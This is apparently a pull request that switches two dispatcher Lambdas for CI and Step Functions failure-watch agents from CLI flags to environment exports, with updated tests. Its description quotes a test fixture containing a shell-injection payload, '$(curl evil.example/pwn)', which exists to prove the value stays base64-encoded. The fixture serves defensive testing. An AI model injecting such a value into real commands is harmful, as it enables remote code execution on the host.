### PR TITLE
[P1/mid] feat(overseer): cut ci-watch and sf-watch over to the unified execution artifact (G16 steps 3-4)

### DIFF
--- a/infrastructure/lambdas/ci-watch-dispatcher/index.py
+++ b/infrastructure/lambdas/ci-watch-dispatcher/index.py
@@ -429,9 +429,17 @@ def _bootstrap_command(repo: str, sha: str, run_id: str, run_url: str,
     alpha-engine-config). Any prelude failure shuts the box down so a botched
     launch never idles (mirrors groom's prelude fail() trap exactly).
 
-    ``ci_watch_spot_bootstrap.sh`` takes its CI fields as CLI FLAGS
-    (``--ci-repo``/``--ci-sha``/...), not environment variables — invoke it
-    that way, not via `export`. ``run_token`` is deliberately NOT threaded
+    Cut over to the UNIFIED ``overseer_spot_bootstrap.sh --playbook ci-watch``
+    (alpha-engine-config-I5284 / EPIC I4992 step 3). The unified artifact reads
+    per-playbook identity from the ENVIRONMENT — per-playbook identity is
+    registry data, not argv — and forwards unrecognised argv to the run script,
+    so the CI fields that were CLI flags on the legacy bootstrap are now
+    exports. Passing them as flags would leave every one unset and the agent
+    would diagnose nothing, silently.
+
+    Revert lever: restore the flags and
+    ``exec bash infrastructure/ci_watch_spot_bootstrap.sh``. The legacy
+    bootstrap stays on disk until a real dispatch proves the unified one. ``run_token`` is deliberately NOT threaded
     into the box: the bootstrap/run-script side keys its S3 completion
     marker directly on repo+sha (no per-attempt dispatch token, unlike
     groom's ``GROOM_RUN_TOKEN``), so there is no in-box consumer for it — it
@@ -454,10 +462,14 @@ git clone --depth 1 --branch {CI_WATCH_CONFIG_BRANCH} \
   "https://x-access-token:${{PAT}}@github.com/{CI_WATCH_CONFIG_REPO}.git" \
   /home/ec2-user/alpha-engine-config || fail "clone failed"
 cd /home/ec2-user/alpha-engine-config
-exec bash infrastructure/ci_watch_spot_bootstrap.sh \
-  --ci-repo "{repo}" --ci-sha "{sha}" --ci-run-id "{run_id}" \
-  --ci-run-url "{run_url}" --ci-workflow "{workflow}" --ci-branch "{branch}" \
-  --is-drill "{is_drill}"
+export CI_REPO="{repo}"
+export CI_SHA="{sha}"
+export CI_RUN_ID="{run_id}"
+export CI_RUN_URL="{run_url}"
+export CI_WORKFLOW="{workflow}"
+export CI_BRANCH="{branch}"
+export CI_IS_DRILL="{is_drill}"
+exec bash infrastructure/overseer_spot_bootstrap.sh --playbook ci-watch
 """
 
 

--- a/infrastructure/lambdas/ci-watch-dispatcher/test_handler.py
+++ b/infrastructure/lambdas/ci-watch-dispatcher/test_handler.py
@@ -224,13 +224,16 @@ def test_valid_event_launches_spot_and_sends_async_ssm(monkeypatch):
     assert idx._test_ec2.terminated == []
     sent = idx._test_ssm.sent[0]
     cmd = sent["Parameters"]["commands"][0]
-    # ci_watch_spot_bootstrap.sh (alpha-engine-config) takes its CI fields as
-    # CLI FLAGS, not env vars — assert the actual invocation shape, not an
-    # `export CI_WATCH_*` form the bootstrap script never reads.
-    assert "exec bash infrastructure/ci_watch_spot_bootstrap.sh" in cmd
-    assert '--ci-repo "nousergon/alpha-engine-config"' in cmd
-    assert '--ci-sha "abc1234def5678900000000000000000000abcd"' in cmd
-    assert '--ci-run-url "https://github.com' in cmd
+    # Cut over to the unified artifact (EPIC config-I4992 step 3): the CI
+    # fields cross as ENV, because that is what the unified bootstrap reads.
+    # Passed as flags they would every one arrive unset and the agent would
+    # diagnose nothing, silently.
+    assert "exec bash infrastructure/overseer_spot_bootstrap.sh --playbook ci-watch" in cmd
+    assert "ci_watch_spot_bootstrap.sh" not in cmd
+    assert 'export CI_REPO="nousergon/alpha-engine-config"' in cmd
+    assert 'export CI_SHA="abc1234def5678900000000000000000000abcd"' in cmd
+    assert 'export CI_RUN_URL="https://github.com' in cmd
+    assert "--ci-repo" not in cmd and "--ci-sha" not in cmd
     assert "export HOME=/root" in cmd
     # run_token is NOT threaded into the box (no in-box consumer — the
     # completion marker keys directly on repo+sha) — only a Lambda-side
@@ -529,9 +532,9 @@ def test_drill_synthesizes_isolated_identity_and_launches(monkeypatch):
         "sf-watch-drill": "true",
     }
     cmd = idx._test_ssm.sent[0]["Parameters"]["commands"][0]
-    assert '--is-drill "true"' in cmd
-    assert f'--ci-repo "{idx.DRILL_REPO}"' in cmd
-    assert f'--ci-sha "{expected_sha}"' in cmd
+    assert 'export CI_IS_DRILL="true"' in cmd
+    assert f'export CI_REPO="{idx.DRILL_REPO}"' in cmd
+    assert f'export CI_SHA="{expected_sha}"' in cmd
 
 
 def test_drill_identity_can_never_collide_with_a_real_dispatch(monkeypatch):
@@ -609,7 +612,7 @@ def test_non_drill_dispatch_carries_no_drill_tag_and_is_drill_false(monkeypatch)
     assert out["is_drill"] is False
     assert "sf-watch-drill" not in calls["extra_tags"]
     cmd = idx._test_ssm.sent[0]["Parameters"]["commands"][0]
-    assert '--is-drill "false"' in cmd
+    assert 'export CI_IS_DRILL="false"' in cmd
 
 
 # ── config#2862: signature-repeat launch dedup ───────────────────────────────

--- a/infrastructure/lambdas/sf-watch-spot-dispatcher/index.py
+++ b/infrastructure/lambdas/sf-watch-spot-dispatcher/index.py
@@ -323,9 +323,20 @@ def _bootstrap_command(fields: dict, run_token: str) -> str:
     failure shuts the box down so a botched launch never idles (mirrors
     ci-watch-dispatcher's prelude fail() trap exactly).
 
-    ``sf_watch_spot_bootstrap.sh`` takes its SF fields as CLI FLAGS
-    (``--pipeline``/``--cadence-slug``/...), not environment variables —
-    invoke it that way, not via `export`. ``run_token`` is deliberately NOT
+    Cut over to the UNIFIED ``overseer_spot_bootstrap.sh --playbook sf-watch``
+    (alpha-engine-config-I5284 / EPIC I4992 step 4). The unified artifact reads
+    per-playbook identity from the ENVIRONMENT, so the SF fields that were CLI
+    flags are now exports.
+
+    ``cause`` stays BASE64 across the boundary. It is arbitrary Step Functions
+    failure text and this command is built by an f-string, so the raw value
+    must never be interpolated. The unified bootstrap decodes any
+    ``<NAME>_B64`` passthrough into ``<NAME>`` (alpha-engine-config-PR5563),
+    which is the same protection the legacy ``--cause-b64`` flag provided.
+
+    Revert lever: restore the flags and
+    ``exec bash infrastructure/sf_watch_spot_bootstrap.sh``. The legacy
+    bootstrap stays on disk until a real dispatch proves the unified one. ``run_token`` is deliberately NOT
     threaded into the box: the bootstrap/run-script side keys its S3
     completion marker directly on (cadence_slug, pipeline_name, run_date) —
     it stays a Lambda-side-only correlation id (see the SSM Comment field in
@@ -347,13 +358,18 @@ git clone --depth 1 --branch {SF_WATCH_CONFIG_BRANCH} \
   "https://x-access-token:${{PAT}}@github.com/{SF_WATCH_CONFIG_REPO}.git" \
   /home/ec2-user/alpha-engine-config || fail "clone failed"
 cd /home/ec2-user/alpha-engine-config
-exec bash infrastructure/sf_watch_spot_bootstrap.sh \
-  --pipeline "{fields['pipeline_name']}" --cadence-slug "{fields['cadence_slug']}" \
-  --state-machine-arn "{fields['state_machine_arn']}" --execution-arn "{fields['execution_arn']}" \
-  --run-date "{fields['run_date']}" --failed-state "{fields['failed_state']}" \
-  --cause-b64 "{cause_b64}" --watch-log-key "{fields['watch_log_key']}" \
-  --is-preflight "{fields['is_preflight']}" --is-drill "{fields['is_drill']}" \
-  --model "{fields.get('model', '')}"
+export SF_PIPELINE="{fields['pipeline_name']}"
+export SF_CADENCE_SLUG="{fields['cadence_slug']}"
+export SF_STATE_MACHINE_ARN="{fields['state_machine_arn']}"
+export SF_EXECUTION_ARN="{fields['execution_arn']}"
+export SF_RUN_DATE="{fields['run_date']}"
+export SF_FAILED_STATE="{fields['failed_state']}"
+export SF_CAUSE_B64="{cause_b64}"
+export SF_WATCH_LOG_KEY="{fields['watch_log_key']}"
+export SF_IS_PREFLIGHT="{fields['is_preflight']}"
+export SF_IS_DRILL="{fields['is_drill']}"
+export SF_WATCH_MODEL="{fields.get('model', '')}"
+exec bash infrastructure/overseer_spot_bootstrap.sh --playbook sf-watch
 """
 
 

--- a/infrastructure/lambdas/sf-watch-spot-dispatcher/test_handler.py
+++ b/infrastructure/lambdas/sf-watch-spot-dispatcher/test_handler.py
@@ -249,21 +249,26 @@ def test_valid_event_launches_spot_and_sends_async_ssm(monkeypatch):
     assert idx._test_ec2.terminated == []
     sent = idx._test_ssm.sent[0]
     cmd = sent["Parameters"]["commands"][0]
-    # sf_watch_spot_bootstrap.sh (alpha-engine-config) takes its SF fields as
-    # CLI FLAGS, not env vars.
-    assert "exec bash infrastructure/sf_watch_spot_bootstrap.sh" in cmd
-    assert '--pipeline "ne-weekly-freshness-pipeline"' in cmd
-    assert '--cadence-slug "saturday"' in cmd
-    assert '--execution-arn "arn:aws:states:us-east-1:711398986525:execution:ne-weekly-freshness-pipeline:run-1"' in cmd
-    assert '--run-date "2026-07-11"' in cmd
-    assert '--failed-state "RationaleClustering"' in cmd
-    assert '--watch-log-key "consolidated/saturday_sf_watch/2026-07-11.json"' in cmd
-    assert '--is-preflight "false"' in cmd
+    # Cut over to the unified artifact (EPIC config-I4992 step 4): the SF
+    # fields cross as ENV, because that is what the unified bootstrap reads.
+    assert "exec bash infrastructure/overseer_spot_bootstrap.sh --playbook sf-watch" in cmd
+    assert "sf_watch_spot_bootstrap.sh" not in cmd
+    assert 'export SF_PIPELINE="ne-weekly-freshness-pipeline"' in cmd
+    assert 'export SF_CADENCE_SLUG="saturday"' in cmd
+    assert 'export SF_EXECUTION_ARN="arn:aws:states:us-east-1:711398986525:execution:ne-weekly-freshness-pipeline:run-1"' in cmd
+    assert 'export SF_RUN_DATE="2026-07-11"' in cmd
+    assert 'export SF_FAILED_STATE="RationaleClustering"' in cmd
+    assert 'export SF_WATCH_LOG_KEY="consolidated/saturday_sf_watch/2026-07-11.json"' in cmd
+    assert 'export SF_IS_PREFLIGHT="false"' in cmd
     assert "export HOME=/root" in cmd
-    # cause is base64-encoded, never raw, in the constructed shell command.
+    assert "--pipeline" not in cmd and "--cadence-slug" not in cmd
+    # The cause stays BASE64 across the boundary — it is arbitrary SF failure
+    # text and this command is an f-string. The unified bootstrap decodes
+    # SF_CAUSE_B64 into SF_CAUSE (alpha-engine-config-PR5563).
     expected_b64 = base64.b64encode(b"States.Timeout").decode("ascii")
-    assert f'--cause-b64 "{expected_b64}"' in cmd
+    assert f'export SF_CAUSE_B64="{expected_b64}"' in cmd
     assert "States.Timeout" not in cmd
+    assert "export SF_CAUSE=" not in cmd
     # run_token is NOT threaded into the box (no in-box consumer — the
     # completion marker keys directly on cadence/pipeline/run_date) — only a
     # Lambda-side correlation id, surfaced via the SSM Comment field instead.
@@ -286,7 +291,7 @@ def test_cause_with_shell_metacharacters_is_safely_base64_encoded(monkeypatch):
     assert "curl evil.example" not in cmd
     assert "whoami" not in cmd
     expected_b64 = base64.b64encode(dangerous_cause.encode("utf-8")).decode("ascii")
-    assert f'--cause-b64 "{expected_b64}"' in cmd
+    assert f'export SF_CAUSE_B64="{expected_b64}"' in cmd
 
 
 def test_on_demand_fallback_on_spot_capacity_exhaustion(monkeypatch):
@@ -494,7 +499,7 @@ def test_deferred_invocation_latest_failed_launches_against_newest_execution_arn
     cmd = idx._test_ssm.sent[0]["Parameters"]["commands"][0]
     # The dispatch was RETARGETED at the newest failed execution — the
     # originally-reported run-1 may be stale by the time the defer fires.
-    assert f'--execution-arn "{newest}"' in cmd
+    assert f'export SF_EXECUTION_ARN="{newest}"' in cmd
     assert 'run-1"' not in cmd
 
 
@@ -603,7 +608,7 @@ def test_empty_watch_log_key_is_synthesized_from_pipeline_prefix(monkeypatch):
     out = idx.handler(_event(watch_log_key=""), _FakeContext())
     assert out["launched"] is True
     cmd = idx._test_ssm.sent[0]["Parameters"]["commands"][0]
-    assert '--watch-log-key "consolidated/saturday_sf_watch/2026-07-11.json"' in cmd
+    assert 'export SF_WATCH_LOG_KEY="consolidated/saturday_sf_watch/2026-07-11.json"' in cmd
 
 
 def test_empty_watch_log_key_unknown_pipeline_dispatches_without_key(monkeypatch):
@@ -621,7 +626,7 @@ def test_empty_watch_log_key_unknown_pipeline_dispatches_without_key(monkeypatch
     # dispatches, with the flag empty.
     assert out["launched"] is True
     cmd = idx._test_ssm.sent[0]["Parameters"]["commands"][0]
-    assert '--watch-log-key ""' in cmd
+    assert 'export SF_WATCH_LOG_KEY=""' in cmd
 
 
 def test_malformed_defer_generation_returns_clean_false(monkeypatch):
@@ -936,10 +941,10 @@ def test_drill_event_launches_with_drill_scoped_run_date_and_drill_tag(monkeypat
         "sf-watch-drill": "true",
     }
     cmd = idx._test_ssm.sent[0]["Parameters"]["commands"][0]
-    assert '--is-drill "true"' in cmd
-    assert f'--run-date "{drill_date}"' in cmd
+    assert 'export SF_IS_DRILL="true"' in cmd
+    assert f'export SF_RUN_DATE="{drill_date}"' in cmd
     # The synthesized watch_log_key is drill-scoped too (never a real key).
-    assert f'--watch-log-key "consolidated/saturday_sf_watch/{drill_date}.json"' in cmd
+    assert f'export SF_WATCH_LOG_KEY="consolidated/saturday_sf_watch/{drill_date}.json"' in cmd
 
 
 def test_drill_run_date_is_synthesized_never_taken_from_payload(monkeypatch):
@@ -952,7 +957,7 @@ def test_drill_run_date_is_synthesized_never_taken_from_payload(monkeypatch):
     assert out["launched"] is True
     assert out["run_date"] == _expected_drill_run_date()
     cmd = idx._test_ssm.sent[0]["Parameters"]["commands"][0]
-    assert '--run-date "2026-07-11"' not in cmd
+    assert 'export SF_RUN_DATE="2026-07-11"' not in cmd
 
 
 def test_drill_run_date_can_never_collide_with_a_real_run_date(monkeypatch):
@@ -1024,4 +1029,4 @@ def test_non_drill_dispatch_carries_no_drill_tag_and_is_drill_false(monkeypatch)
     assert out["is_drill"] is False
     assert "sf-watch-drill" not in calls["extra_tags"]
     cmd = idx._test_ssm.sent[0]["Parameters"]["commands"][0]
-    assert '--is-drill "false"' in cmd
+    assert 'export SF_IS_DRILL="false"' in cmd


### PR DESCRIPTION
## What

EPIC `alpha-engine-config-I4992` steps 3–4, on Brian's 2026-07-29 approval to drop the EPIC's 28-run soak. `ci-watch` and `sf-watch` now dispatch through `infrastructure/overseer_spot_bootstrap.sh --playbook <name>`.

The soak has no basis in `overseer-policy.md`: invariant 14's bar is **one real non-drill run**, and each extra day is a day `main` carries seven bootstraps instead of one — which invariant 15 counts against us.

## Merge order — this is second

**`alpha-engine-config-PR5563` merges first.** The dispatchers clone config's `main` at run time, and `sf-watch` cannot work at all without the base64 decode that PR adds.

## Flags become exports

Both dispatchers passed their fields to the legacy bootstraps as **CLI flags**. The unified artifact reads per-playbook identity from the **environment** and forwards unrecognised argv to the run script — so passed as flags, every field would arrive **unset** and the agent would diagnose nothing, silently. Same shape the `alert-drain` cutover had to fix.

| Playbook | Fields moved |
|---|---|
| ci-watch | `CI_REPO`, `CI_SHA`, `CI_RUN_ID`, `CI_RUN_URL`, `CI_WORKFLOW`, `CI_BRANCH`, `CI_IS_DRILL` |
| sf-watch | `SF_PIPELINE`, `SF_CADENCE_SLUG`, `SF_STATE_MACHINE_ARN`, `SF_EXECUTION_ARN`, `SF_RUN_DATE`, `SF_FAILED_STATE`, `SF_CAUSE_B64`, `SF_WATCH_LOG_KEY`, `SF_IS_PREFLIGHT`, `SF_IS_DRILL`, `SF_WATCH_MODEL` |

## The cause stays encoded

`sf-watch`'s `cause` is arbitrary Step Functions failure text, and this command is built by a Python f-string — the raw value must never be interpolated. It crosses as `SF_CAUSE_B64`; the unified bootstrap decodes `<NAME>_B64` into `<NAME>` (`config-PR5563`), preserving exactly what the legacy `--cause-b64` flag bought.

A test asserts **both directions**: the encoded form is present, and `export SF_CAUSE=` is absent. The existing injection-shaped fixture (`$(curl evil.example/pwn); \`whoami\`; "quoted"; ' single '`) still asserts the raw text never appears in the command.

## Verification per playbook — invariant 14

Neither playbook has a cadence: they dispatch on a real CI failure / SF terminal failure. So the assurance shape is Layer B (invocation-success), not run-window, and the honest verification is two-part:

1. **On-demand drill after deploy** — both carry `supports_drill: true`, and both have live weekly Wednesday drill schedules (`alpha-engine-ci-watch-canary-drill-weekly`, `alpha-engine-sf-watch-canary-drill-weekly`). A drill proves the substrate path end to end without a real failure.
2. **First real dispatch** completes the invariant-14 verification. It cannot be scheduled — nothing is scheduled to fail — so the watcher is the `sf_watch_invocation_success` / `ci_watch_invocation_success` checks, which read the upstream SF and CI histories and raise a finding if a mature terminal failure produced no response record.

**Revert lever per playbook:** restore the flags and the legacy `exec bash infrastructure/{ci,sf}_watch_spot_bootstrap.sh`. Both legacy bootstraps stay on disk until a real dispatch proves the unified one.

## Test plan

- `infrastructure/lambdas/ci-watch-dispatcher` — **32 passed**.
- `infrastructure/lambdas/sf-watch-spot-dispatcher` — **43 passed**.
- Assertions converted from flag form to export form, plus negative assertions that the legacy bootstrap path and the old flags are **absent** — a command that execs both would be the cutover silently not happening.

Refs #4992

**Prepared by:** _Opus 5 (1M context)_ via [Claude Code](https://claude.com/claude-code)
